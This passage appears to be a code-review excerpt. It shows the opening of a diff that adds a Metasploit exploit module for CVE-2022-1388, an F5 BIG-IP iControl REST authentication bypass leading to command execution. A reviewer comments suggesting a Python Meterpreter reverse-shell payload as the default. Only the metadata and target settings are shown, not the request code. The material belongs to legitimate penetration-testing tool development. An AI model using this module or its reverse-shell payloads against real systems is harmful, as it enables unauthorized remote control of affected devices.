modules/exploits/linux/http/f5_icontrol_rce.rb

```diff
@@ -0,0 +1,167 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'F5 BIG-IP iControl REST authentication bypass',
+        'Description' => %q{
+          This module exploits a authentication bypass vulnerability
+          in the F5 iControl REST service to execute commands on an
+          affected BIG-IP trough the endpoint `/mgmt/tm/util/bash`.
+        },
+        'Author' => [
+          'Heyder Andrade', # Metasploit module
+          'alt3kx <alt3kx[at]protonmail.com>' # PoC
+        ],
+        'References' => [
+          ['CVE', '2022-1388'],
+          ['URL', 'https://support.f5.com/csp/article/K23605346'],
+          ['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/']
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2022-05-04', # Vendor advisory
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
```

Comment:
This can probably be the new default:

```suggestion
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
```